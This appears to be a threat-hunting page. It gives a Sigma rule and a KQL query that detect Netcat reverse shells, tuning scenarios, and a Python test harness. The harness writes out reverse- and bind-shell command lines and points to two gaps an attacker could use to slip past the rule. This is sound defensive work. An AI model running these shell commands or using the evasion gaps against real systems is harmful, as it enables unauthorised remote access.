The hypothesis is that the detection identifies potential adversary use of Netcat to spawn a shell attached to a network socket (a reverse shell, or equally a bind shell), which maps to T1059 (Command and Scripting Interpreter) and in practice hands the adversary an interactive command-and-control channel on the host. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and contain such early-stage interactive access before it is turned into persistence.
Detection Rule
title: Potential Netcat Reverse Shell Execution
id: 7f734ed0-4f47-46c0-837f-6ee62505abd9
status: test
description: Detects execution of netcat with the "-e" (or "-c") flag followed by common shells. This could be a sign of a potential reverse shell setup.
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
    - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
    - https://www.infosecademy.com/netcat-reverse-shells/
    - https://man7.org/linux/man-pages/man1/ncat.1.html
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-07
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: linux
detection:
    selection_nc:
        Image|endswith:
            - '/nc'
            - '/ncat'
    selection_flags:
        CommandLine|contains:
            - ' -c '
            - ' -e '
    selection_shell:
        CommandLine|contains:
            - ' ash'
            - ' bash'
            - ' bsh'
            - ' csh'
            - ' ksh'
            - ' pdksh'
            - ' sh'
            - ' tcsh'
            - '/bin/ash'
            - '/bin/bash'
            - '/bin/bsh'
            - '/bin/csh'
            - '/bin/ksh'
            - '/bin/pdksh'
            - '/bin/sh'
            - '/bin/tcsh'
            - '/bin/zsh'
            - '$IFSash'
            - '$IFSbash'
            - '$IFSbsh'
            - '$IFScsh'
            - '$IFSksh'
            - '$IFSpdksh'
            - '$IFSsh'
            - '$IFStcsh'
            - '$IFSzsh'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
imProcessCreate
| where TargetProcessName endswith "/nc" or TargetProcessName endswith "/ncat"
| where TargetProcessCommandLine contains " -c " or TargetProcessCommandLine contains " -e "
| where TargetProcessCommandLine contains " ash"
    or TargetProcessCommandLine contains " bash"
    or TargetProcessCommandLine contains " bsh"
    or TargetProcessCommandLine contains " csh"
    or TargetProcessCommandLine contains " ksh"
    or TargetProcessCommandLine contains " pdksh"
    or TargetProcessCommandLine contains " sh"
    or TargetProcessCommandLine contains " tcsh"
    or TargetProcessCommandLine contains "/bin/ash"
    or TargetProcessCommandLine contains "/bin/bash"
    or TargetProcessCommandLine contains "/bin/bsh"
    or TargetProcessCommandLine contains "/bin/csh"
    or TargetProcessCommandLine contains "/bin/ksh"
    or TargetProcessCommandLine contains "/bin/pdksh"
    or TargetProcessCommandLine contains "/bin/sh"
    or TargetProcessCommandLine contains "/bin/tcsh"
    or TargetProcessCommandLine contains "/bin/zsh"
    or TargetProcessCommandLine contains "$IFSash"
    or TargetProcessCommandLine contains "$IFSbash"
    or TargetProcessCommandLine contains "$IFSbsh"
    or TargetProcessCommandLine contains "$IFScsh"
    or TargetProcessCommandLine contains "$IFSksh"
    or TargetProcessCommandLine contains "$IFSpdksh"
    or TargetProcessCommandLine contains "$IFSsh"
    or TargetProcessCommandLine contains "$IFStcsh"
    or TargetProcessCommandLine contains "$IFSzsh"
Scenario: Scheduled System Maintenance Task Using Netcat
Description: A cron or systemd timer job uses netcat to check connectivity to a monitoring server (for example nc -z monitor.internal 443). "Task Scheduler" is a Windows concept; on Linux the parent is cron, crond or systemd.
Filter/Exclusion: None required. A connectivity check carries neither -c/-e nor a shell argument, so it never satisfies all three selections. Do not exclude on -z alone: -z and -e can appear on the same command line, so such a filter would create a blind spot rather than remove a false positive.
Scenario: Network Diagnostic Tool Using Netcat
Description: A network administrator uses nc to test port connectivity (nc -zv host port) or to talk to a service by hand.
Filter/Exclusion: None required for -z/-zv usage. Never exclude on process.name:"nc" or process.name:"ncat": those are exactly the images the rule looks for, so the exclusion silently disables the detection.
Scenario: Log Collection via Netcat
Description: A log shipper pipes records into netcat to reach a central collector (for example ... | nc -u 10.0.0.7 514).
Filter/Exclusion: None required; the data comes in over a pipe, and the nc command line holds only the destination, not -e <shell>. If an exclusion is still wanted, key it on the parent process together with the exact destination, not on process.name:"ncat" or on -u by itself.
Scenario: Admin Task Using Netcat Under SSH
Description: Netcat does not itself establish an SSH tunnel; the realistic form is an ssh_config ProxyCommand (for example ProxyCommand nc -X connect -x proxy:3128 %h %p), where nc is spawned by the ssh client.
Filter/Exclusion: None required; a ProxyCommand line has no -c/-e and no shell argument. process.command_line:"-z <remote_ip>" does not describe this case. If a bespoke wrapper really does pass -e, exclude on process.parent_process_name:"ssh" only in combination with the exact command line and the originating user: any command, including a reverse shell, can be spawned under an ssh client via ProxyCommand, so the parent alone proves nothing.
Scenario: Automated Backup Tool Using Netcat for Data Transfer
Description: A backup job streams an archive over the internal network (for example tar cf - /data | nc backup.internal 9000).
Filter/Exclusion: None required; the nc command line carries only host and port. If the job is one of the rare ones that uses ncat -c/--sh-exec to run a receiver, scope the exclusion to process.parent_process_name:"backup_service" plus the exact command line and destination, never to the parent or the -u flag alone.
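To check the rule logic and the false-positive reasoning above without a Sentinel workspace, the following Python script re-implements the three Sigma selections and runs them over a handful of constructed Linux process_creation events. It is an added example, not SigmaHQ code and not the page's own query; the images, command lines and addresses are made up, and the last two events deliberately exercise two gaps in the rule as written (a `$IFS` between the flag and the shell, and telemetry that records a resolved binary name that does not end in `/nc`).

```python
"""Re-implementation of the Sigma logic for 'Potential Netcat Reverse Shell
Execution' (constructed example, not SigmaHQ code).  All events, paths and
IP addresses below are made up for the demonstration."""
from dataclasses import dataclass

# selection_nc
NC_IMAGES = ("/nc", "/ncat")
# selection_flags: the surrounding spaces are part of the pattern
FLAGS = (" -c ", " -e ")
# selection_shell, reproduced exactly as the rule lists it: ' zsh' is absent
# from the space-prefixed group, while '/bin/zsh' and '$IFSzsh' are present.
SHELLS = ("ash", "bash", "bsh", "csh", "ksh", "pdksh", "sh", "tcsh", "zsh")
SHELL_TOKENS = (
    tuple(" " + s for s in SHELLS if s != "zsh")
    + tuple("/bin/" + s for s in SHELLS)
    + tuple("$IFS" + s for s in SHELLS)
)


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # Sigma field Image / ASIM TargetProcessName
    command_line: str   # Sigma field CommandLine / ASIM TargetProcessCommandLine


def matches(event: ProcessEvent) -> bool:
    """condition: all of selection_*.  Sigma string modifiers are
    case-insensitive, so both sides are lower-cased before comparing."""
    image = event.image.lower()
    cmd = event.command_line.lower()
    selection_nc = image.endswith(NC_IMAGES)
    selection_flags = any(flag in cmd for flag in FLAGS)
    selection_shell = any(token.lower() in cmd for token in SHELL_TOKENS)
    return selection_nc and selection_flags and selection_shell


# Constructed events: (description, event, expected verdict)
SAMPLE_EVENTS = [
    ("classic reverse shell",
     ProcessEvent("/usr/bin/nc", "nc -e /bin/sh 10.0.0.5 4444"), True),
    ("ncat -c with a bare shell name",
     ProcessEvent("/usr/bin/ncat", "ncat -c bash 10.0.0.5 4444"), True),
    ("bind shell also fires (the rule is not limited to reverse shells)",
     ProcessEvent("/usr/bin/ncat", "ncat -l -p 4444 -e /bin/bash"), True),
    ("cron connectivity check (scenarios 1 and 2): no -c/-e, no shell",
     ProcessEvent("/usr/bin/nc", "nc -z monitor.internal 443"), False),
    ("log shipping over UDP (scenario 3)",
     ProcessEvent("/usr/bin/nc", "nc -u 10.0.0.7 514"), False),
    ("ssh ProxyCommand (scenario 4)",
     ProcessEvent("/usr/bin/nc", "nc -X connect -x proxy.internal:3128 host 22"), False),
    ("gap: $IFS after the flag removes the trailing space ' -e ' needs",
     ProcessEvent("/usr/bin/nc", "nc -e$IFS/bin/bash 10.0.0.5 4444"), False),
    ("gap: telemetry recording the resolved binary instead of /bin/nc",
     ProcessEvent("/usr/bin/nc.traditional",
                  "nc.traditional -e /bin/sh 10.0.0.5 4444"), False),
]


def run(events=SAMPLE_EVENTS):
    """Evaluate every sample event; returns (description, verdict, expected)."""
    return [(desc, matches(ev), expected) for desc, ev, expected in events]


if __name__ == "__main__":
    for desc, verdict, expected in run():
        tag = "ALERT" if verdict else "  -  "
        note = "" if verdict == expected else "  <-- unexpected"
        print(f"{tag} {desc}{note}")
```

The two "gap" events are the caveats a practitioner should carry into tuning: the rule needs a literal space on both sides of `-e`/`-c`, and it keys on an image ending in `/nc` or `/ncat`, so a distribution that logs the resolved alternative (`nc.traditional`, `nc.openbsd`) rather than the `/bin/nc` symlink is worth a separate look in the telemetry before the rule is trusted.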